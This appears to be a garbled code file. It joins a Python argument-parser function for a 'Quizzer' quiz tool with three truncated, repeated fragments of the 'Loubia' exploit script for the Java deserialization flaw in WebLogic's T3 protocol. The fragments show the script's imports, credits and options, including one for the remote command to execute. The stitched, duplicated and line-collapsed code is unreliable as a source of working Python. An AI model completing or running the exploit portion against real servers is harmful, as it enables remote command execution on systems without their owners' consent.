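def parse(argv):
    """Build the Quizzer command-line parser and parse ``argv``.

    Args:
        argv: Argument strings to parse, without the program name. ``None``
            falls back to optparse's default of ``sys.argv[1:]``.
            NOTE(review): a caller that passes the whole of ``sys.argv``
            should slice off element 0 first -- confirm against callers.

    Returns:
        The ``(options, args)`` pair produced by ``OptionParser.parse_args``.
    """
    # optparse has no ``banner`` attribute; the usage string is what --help
    # prints, so the text is passed there instead.
    opts = OptionParser(usage="Usage: Quizzer [ options ]")

    # -h/--help is registered by OptionParser itself. Re-adding it raises
    # OptionConflictError, and a help text passed positionally is rejected as
    # an invalid option string, so the explicit registration is dropped.
    opts.add_option(
        "-f", "--file",
        dest="filename",
        help="-f Quizz.json,Assessment.json",
        metavar="FILE",
    )
    # The long name used to be a second "--file", which optparse refuses as a
    # conflicting option string.
    # NOTE(review): dest is still "filename", shared with -f as in the
    # original; confirm whether the manifest path needs its own destination.
    opts.add_option(
        "-m", "--manifest",
        dest="filename",
        help="-m Manifest.json",
        metavar="FILE",
    )
    opts.add_option(
        "-q", "--quiet",
        action="store_false",
        dest="verbose",
        default=True,
        help="don't print status messages to stdout",
    )

    # Parse the arguments the caller supplied (the parameter used to be
    # ignored) and hand the result back instead of discarding it.
    options, args = opts.parse_args(list(argv) if argv is not None else None)
    return options, args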
import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]" "", version="%prog 1.0") parser.banner = "Nervous WebLogic Unserialize Vulnerability Exploit\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option( "-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix", ) parser.add_option("-l", "--shell", type="choice", choices=['sh', 'bash'],
# Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]" "", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option( "-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",
#!/usr/bin/python # Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]""", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option("-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",) parser.add_option("-l", "--shell", type="choice", choices=['sh', 'bash'],